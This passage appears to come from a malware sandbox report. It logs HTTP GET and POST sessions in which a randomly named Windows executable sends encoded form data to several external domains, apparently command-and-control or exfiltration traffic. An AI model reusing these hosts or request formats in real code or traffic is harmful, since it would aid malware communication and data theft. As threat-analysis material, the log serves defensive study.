                                                  4192.168.2.764459172.67.194.145806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:15.086308002 CEST462OUTGET /ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:24:15.787378073 CEST871INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:15 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:15 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIrZnvP848ss291UZKTCSye2pq7CFXqXPQ3nvJk9XoSkPw%2BdrfA7E6Hqw%2B90U0pfYlwibpFcomNac5WkjrGcmo5kFHunZxgsd%2Fs2F8%2B%2BqC64YzV7sL7309FaAQQVt%2B0%2BWtOKpF6JGvRFdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c816acecfc3300-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                  Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                  Jul 1, 2024 19:24:15.787462950 CEST5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192.168.2.76446038.55.194.3080
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:29.472742081 CEST710OUTPOST /80eg/ HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.86wqi.cyou
                                                  Referer: http://www.86wqi.cyou/80eg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 79 69 38 39 34 4e 47 39 6d 76 6a 68 63 75 73 63 47 7a 44 33 42 62 78 6a 71 4d 37 62 68 4d 68 44 6a 66 64 59 64 66 53 44 73 77 50 45 72 4d 73 68 49 63 57 47 41 4e 6b 6b 4a 73 51 63 43 78 4f 33 4f 56 45 6b 6f 33 51 44 6b 77 55 48 72 56 47 43 49 6d 39 56 43 33 7a 34 68 58 50 52 46 30 48 4b 39 6b 58 65 73 6a 52 50 49 79 5a 57 51 39 33 43 68 34 36 69 37 73 37 33 76 52 31 6f 4f 35 38 7a 66 77 70 6e 59 32 45 65 38 50 69 70 4c 32 59 37 4e 67 59 42 71 74 6b 73 45 66 31 5a 6a 6b 6c 6a 48 62 42 57 6f 69 56 47 2f 34 50 57 58 67 50 39 71 30 4d 77 6f 54 74 35 48 56 6f 69 32 46 79 61 6f 6e 51 75 6c 63 52 61 78 52 50 5a 76 4e 53 58 49 51 3d 3d
                                                  Data Ascii: FTP84=yi894NG9mvjhcuscGzD3BbxjqM7bhMhDjfdYdfSDswPErMshIcWGANkkJsQcCxO3OVEko3QDkwUHrVGCIm9VC3z4hXPRF0HK9kXesjRPIyZWQ93Ch46i7s73vR1oO58zfwpnY2Ee8PipL2Y7NgYBqtksEf1ZjkljHbBWoiVG/4PWXgP9q0MwoTt5HVoi2FyaonQulcRaxRPZvNSXIQ==


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.76446138.55.194.30806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:32.010243893 CEST730OUTPOST /80eg/ HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.86wqi.cyou
                                                  Referer: http://www.86wqi.cyou/80eg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 79 69 38 39 34 4e 47 39 6d 76 6a 68 54 75 38 63 56 45 76 33 56 4c 78 6b 68 73 37 62 6f 73 68 48 6a 65 68 59 64 61 72 47 73 6a 6e 45 79 73 38 68 50 64 57 47 46 4e 6b 6b 43 4d 51 54 66 42 4f 43 4f 56 42 54 6f 32 63 44 6b 77 51 48 72 55 32 43 49 57 42 57 45 6e 7a 32 75 33 50 70 4c 55 48 4b 39 6b 58 65 73 6e 78 70 49 79 68 57 51 74 6e 43 67 5a 36 6a 7a 4d 37 34 6d 78 31 6f 4b 35 38 2f 66 77 70 46 59 79 4d 30 38 4b 75 70 4c 30 51 37 4d 78 59 41 6b 74 6b 51 61 76 30 50 6e 31 56 73 49 62 39 50 6c 55 67 61 6c 59 2f 52 66 32 53 66 77 57 41 63 32 43 56 43 44 58 4d 55 68 6a 76 76 71 6d 55 32 6f 2b 6c 37 75 6d 71 7a 69 66 7a 54 65 6c 5a 70 4d 54 7a 6d 64 4b 62 76 63 72 65 2b 67 59 69 55 63 53 6b 3d
                                                  Data Ascii: FTP84=yi894NG9mvjhTu8cVEv3VLxkhs7boshHjehYdarGsjnEys8hPdWGFNkkCMQTfBOCOVBTo2cDkwQHrU2CIWBWEnz2u3PpLUHK9kXesnxpIyhWQtnCgZ6jzM74mx1oK58/fwpFYyM08KupL0Q7MxYAktkQav0Pn1VsIb9PlUgalY/Rf2SfwWAc2CVCDXMUhjvvqmU2o+l7umqzifzTelZpMTzmdKbvcre+gYiUcSk=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.76446238.55.194.30806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:34.636476994 CEST1743OUTPOST /80eg/ HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.86wqi.cyou
                                                  Referer: http://www.86wqi.cyou/80eg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 79 69 38 39 34 4e 47 39 6d 76 6a 68 54 75 38 63 56 45 76 33 56 4c 78 6b 68 73 37 62 6f 73 68 48 6a 65 68 59 64 61 72 47 73 6a 2f 45 79 2f 6b 68 4a 36 71 47 43 4e 6b 6b 50 73 51 51 66 42 4f 6c 4f 56 35 58 6f 32 68 38 6b 79 59 48 74 79 4b 43 44 45 6c 57 4e 6e 7a 32 32 48 50 53 46 30 47 51 39 6b 48 61 73 6a 64 70 49 79 68 57 51 6f 72 43 6d 49 36 6a 78 4d 37 33 76 52 31 30 4f 35 39 57 66 77 78 2f 59 79 41 4f 37 35 6d 70 49 55 41 37 50 44 77 41 37 64 6b 6f 62 76 30 48 6e 31 59 73 49 59 5a 70 6c 51 68 2f 6c 66 54 52 4d 54 33 66 6f 43 56 4b 76 7a 56 74 43 57 34 72 30 6c 36 63 6f 6b 6b 71 75 2f 46 44 7a 47 72 4d 36 74 37 67 65 6a 30 34 53 52 6a 5a 46 37 6e 63 63 66 33 33 6e 34 4f 6a 50 53 69 59 46 32 31 68 4c 59 45 2f 74 46 2f 74 30 54 36 78 32 63 37 6d 4d 36 52 70 6c 44 45 4b 4d 76 64 75 6d 69 37 68 36 48 66 6a 49 47 6e 52 2f 53 66 59 49 4a 48 4a 61 62 46 31 71 66 6d 72 33 4d 32 68 50 69 67 6f 59 48 4b 48 34 6c 4d 51 32 30 2b 2b 70 6b 47 64 37 7a 47 34 30 73 62 45 2f 53 61 36 56 33 66 68 [TRUNCATED]
                                                  Data Ascii: FTP84=yi894NG9mvjhTu8cVEv3VLxkhs7boshHjehYdarGsj/Ey/khJ6qGCNkkPsQQfBOlOV5Xo2h8kyYHtyKCDElWNnz22HPSF0GQ9kHasjdpIyhWQorCmI6jxM73vR10O59Wfwx/YyAO75mpIUA7PDwA7dkobv0Hn1YsIYZplQh/lfTRMT3foCVKvzVtCW4r0l6cokkqu/FDzGrM6t7gej04SRjZF7nccf33n4OjPSiYF21hLYE/tF/t0T6x2c7mM6RplDEKMvdumi7h6HfjIGnR/SfYIJHJabF1qfmr3M2hPigoYHKH4lMQ20++pkGd7zG40sbE/Sa6V3fhBy0NCQK6D48mw06W0SjsCUlpa6CP91pUcWq/J8NTk5bIlnAp8sW0XKFAJQFiSMPhKp6jd8MhvvwMNk2GHp4IpewqVtnOBXWGFzjTVUx34uvJrVFibxVw1M+kUTnJGBCmLFtVDQoVt6GDa2HXQE3AeoX1O/6umqgQMxYzULz2vTQHGRJzCVFOiFFG9AJ4HQHKBwAr7oP9HOwdQvN9RK/4oVzbZIb128/pUPJIK2wn6bGM4lk0YinruCoeInb9uod0bKODoyW20vWQddZqZYYdB3snuecfXQZ56SKExMiXxPWsob6z1dJ95VKsYxZxYu9T0bKmYAGDv5gsW6eds99PV228a8ZCbsf/F3GLPeVA9/MTX8z/MVQuB+MPXDy3DIXkM8Ft67KwsUznm1OBjYGRvmGaIL3qKtv21d5bsQVcuR3QzPZFho4REe0UZQ0hxuBwn8ZB71C71E6rlhhGHALmzJM/ggkOgmIXYWQpSY/Gy2T6hAECv4FNYSPu0Me+MSeFq4V//XZqIUP1E/Bxt16UzDAvG6eOArjRv3IE/dqq0plxBuPWSbXxv5Nb3b39BXvxJXIdxhMZVvKQrF1IJM7ro1mH5JmI1Yhw/75+LE0rrX2Q6xZaux7fGHL+gc7cQSfDZLziMnUxT/3PYrC8t78wfUNQsy7TNp/USj [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.76446338.55.194.30806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:37.172413111 CEST453OUTGET /80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi4 HTTP/1.1
                                                  Host: www.86wqi.cyou
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.76446446.30.215.51806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:03.784488916 CEST740OUTPOST /e5cg/ HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vivaepicmarbella.com
                                                  Referer: http://www.vivaepicmarbella.com/e5cg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 7a 67 35 76 53 4f 79 48 45 42 73 52 6f 54 46 32 74 4c 4b 68 75 46 68 55 64 46 46 62 34 35 67 50 68 57 47 4b 5a 6c 55 61 76 34 49 53 33 69 78 79 71 69 59 79 38 57 53 45 64 77 6a 54 6b 33 53 7a 37 6f 41 72 4d 47 6d 5a 72 4f 63 58 30 45 53 6a 64 4e 78 34 4d 6d 59 6e 63 37 30 4c 5a 62 51 47 35 33 33 38 46 73 65 42 77 32 76 38 66 69 79 45 35 7a 6d 68 48 2f 30 34 67 61 37 2b 76 61 42 4e 63 5a 6c 76 43 71 49 54 50 71 63 4d 48 52 30 37 71 63 61 77 46 38 30 42 50 44 37 72 6b 39 38 68 4c 53 45 31 70 75 46 6e 65 77 43 41 6d 39 49 37 55 4a 61 52 76 75 2b 34 4f 35 52 54 52 4a 75 5a 64 50 6f 6d 33 48 79 4d 53 42 64 71 44 4a 73 56 42 51 3d 3d
                                                  Data Ascii: FTP84=zg5vSOyHEBsRoTF2tLKhuFhUdFFb45gPhWGKZlUav4IS3ixyqiYy8WSEdwjTk3Sz7oArMGmZrOcX0ESjdNx4MmYnc70LZbQG5338FseBw2v8fiyE5zmhH/04ga7+vaBNcZlvCqITPqcMHR07qcawF80BPD7rk98hLSE1puFnewCAm9I7UJaRvu+4O5RTRJuZdPom3HyMSBdqDJsVBQ==
                                                  Jul 1, 2024 19:25:04.413290977 CEST453INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:04 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18455855971
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.76446546.30.215.51806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:06.538366079 CEST760OUTPOST /e5cg/ HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vivaepicmarbella.com
                                                  Referer: http://www.vivaepicmarbella.com/e5cg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 7a 67 35 76 53 4f 79 48 45 42 73 52 70 7a 5a 32 68 4d 65 68 6c 46 68 54 42 31 46 62 78 5a 67 4c 68 57 4b 4b 5a 6b 51 4b 75 4b 73 53 33 48 31 79 34 54 59 79 76 6d 53 45 46 41 6a 4b 67 33 53 34 37 6f 38 6a 4d 44 47 5a 72 4f 49 58 30 46 43 6a 63 36 6c 33 65 47 59 6c 56 62 30 4e 45 4c 51 47 35 33 33 38 46 73 4c 73 77 32 48 38 66 79 69 45 34 57 47 67 45 2f 30 37 6e 61 37 2b 35 71 42 4a 63 5a 6c 42 43 72 45 35 50 6f 6b 4d 48 55 59 37 71 74 61 76 63 4d 30 4c 43 6a 37 2b 73 38 73 70 47 69 6b 39 77 38 78 74 58 43 2f 69 71 72 56 5a 4f 72 57 39 78 2f 47 44 4b 37 31 6c 47 76 7a 73 66 4f 73 2b 36 6c 47 74 4e 32 34 41 4f 62 4e 52 58 6f 66 78 4d 49 51 71 63 34 45 43 46 36 74 42 7a 37 65 38 67 63 67 3d
                                                  Data Ascii: FTP84=zg5vSOyHEBsRpzZ2hMehlFhTB1FbxZgLhWKKZkQKuKsS3H1y4TYyvmSEFAjKg3S47o8jMDGZrOIX0FCjc6l3eGYlVb0NELQG5338FsLsw2H8fyiE4WGgE/07na7+5qBJcZlBCrE5PokMHUY7qtavcM0LCj7+s8spGik9w8xtXC/iqrVZOrW9x/GDK71lGvzsfOs+6lGtN24AObNRXofxMIQqc4ECF6tBz7e8gcg=
                                                  Jul 1, 2024 19:25:07.172175884 CEST453INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:07 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18437441792
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.76446646.30.215.51806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:09.076472044 CEST1773OUTPOST /e5cg/ HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vivaepicmarbella.com
                                                  Referer: http://www.vivaepicmarbella.com/e5cg/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 7a 67 35 76 53 4f 79 48 45 42 73 52 70 7a 5a 32 68 4d 65 68 6c 46 68 54 42 31 46 62 78 5a 67 4c 68 57 4b 4b 5a 6b 51 4b 75 4b 6b 53 33 56 39 79 71 41 77 79 2b 57 53 45 4d 67 6a 50 67 33 53 6c 37 6f 55 76 4d 44 61 6a 72 4c 4d 58 31 69 43 6a 62 4c 6c 33 56 47 59 6c 58 62 30 4d 5a 62 52 45 35 33 48 67 46 73 62 73 77 32 48 38 66 30 65 45 2b 44 6d 67 43 2f 30 34 67 61 37 49 76 61 41 57 63 5a 73 38 43 72 51 44 50 63 51 4d 48 77 34 37 35 50 79 76 44 38 30 46 46 6a 36 37 73 38 68 33 47 68 52 47 77 34 78 55 58 43 48 69 76 4f 38 42 57 50 6d 47 77 38 57 4b 55 4a 78 6f 4b 65 6a 66 53 2b 67 31 37 57 32 33 58 57 4d 64 4a 64 42 38 61 66 4c 73 4d 65 73 43 51 70 67 48 43 36 63 7a 30 4b 43 62 38 4a 58 43 62 76 43 56 46 6b 57 76 4f 36 67 49 65 78 45 38 77 6d 6a 62 6a 72 42 4e 33 70 2f 4d 79 59 59 6c 59 6a 46 45 6e 65 34 42 6d 49 58 61 5a 77 4e 64 55 31 68 6a 72 52 45 34 30 55 31 50 43 4d 46 79 57 31 72 31 2f 65 59 54 65 73 51 56 64 31 34 76 66 4b 38 30 74 53 34 66 42 44 73 4c 71 4e 4c 68 58 42 67 48 [TRUNCATED]
                                                  Data Ascii: FTP84=zg5vSOyHEBsRpzZ2hMehlFhTB1FbxZgLhWKKZkQKuKkS3V9yqAwy+WSEMgjPg3Sl7oUvMDajrLMX1iCjbLl3VGYlXb0MZbRE53HgFsbsw2H8f0eE+DmgC/04ga7IvaAWcZs8CrQDPcQMHw475PyvD80FFj67s8h3GhRGw4xUXCHivO8BWPmGw8WKUJxoKejfS+g17W23XWMdJdB8afLsMesCQpgHC6cz0KCb8JXCbvCVFkWvO6gIexE8wmjbjrBN3p/MyYYlYjFEne4BmIXaZwNdU1hjrRE40U1PCMFyW1r1/eYTesQVd14vfK80tS4fBDsLqNLhXBgHGHyCgFDomMvMS/hEDKAJbK9J6wOCWSQzHtf1CZ6QS//Q+ZhKm0IPy3hflPTktJVo+5qDef5Riss3SMr+3d/QqQ3xQUDVFjlBktXCJmTVYldQeb5y6qKjbWRz8ETwtkrlLMXrmjUcj/7MSmzVVJpFoRkPJ4ACqoN/Kc2HHVnctZTWpdz9hzo6wzJV2DoFqYv3nDgoHeB56497PdRmzXZDiBE/mC+UNX/AfE9NWzLQeVHIcVDVwbs4OOCXANr/a9TRaEoS9uv71KgWEze7JuTVgW1DHda5KXYrBHcX8m/OK6cBi2jK3Aw4tgCna/N9v2FIqcbYGpHgNFHVx9goAn/ZL3oNkcG/ogHB2kLqLN/yr1239q58oB24F007TfSOdfVJ6qUzldSWQZXQty7cfhcvUZvnmB5+lz17i+I3I4udhtkUXio7jyuuIf7ySTgyVcJQ9dTw6F42ymcjw4SWiDW37NK7JGqZbENwOM6iCF/urLZySIRJxSC0kDcOGdY6Fb6KCw/HHS7/FeF1vbZHBhF5v7GmQTdT+4UZkZS9gO3vG1Dz5snzda90dT66le5MWo6NLXnLH9dpo/pbKUHT4OAHvfcd11J1oWNoqpx8b/ovbYylMp1YF/jxCyVjOVEScjbexAvUc3YSAgYn3VEwoeGJOAxnsVl8Ymg+QD [TRUNCATED]
                                                  Jul 1, 2024 19:25:09.798964977 CEST453INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:09 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18289636085
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.76446746.30.215.51806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:11.804732084 CEST463OUTGET /e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.vivaepicmarbella.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:25:12.455271006 CEST453INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:25:12 GMT
                                                  Server: Apache
                                                  Content-Length: 196
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  X-Onecom-Cluster-Name:
                                                  X-Varnish: 18204808545
                                                  Age: 0
                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                  Connection: close
